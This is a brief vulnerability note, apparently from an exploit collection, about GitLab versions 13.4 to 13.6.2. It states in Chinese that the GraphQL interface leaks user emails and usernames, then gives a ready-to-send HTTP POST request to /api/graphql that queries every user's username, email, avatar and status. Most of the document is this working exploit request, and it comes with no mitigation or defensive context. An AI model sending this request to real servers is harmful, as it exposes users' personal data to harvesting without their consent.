GitLab 13.4 – 13.6.2
GitLab中存在Graphql接口 输入构造的数据时会泄露用户邮箱和用户名
POST /api/graphql HTTP/1.1Host: xxx.xxx.xxx.xxxContent-Length: 212Cookie: xxxxxxxxxxxxxxxxContent-Type: application/json{"query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }","variables":null,"operationName":null}

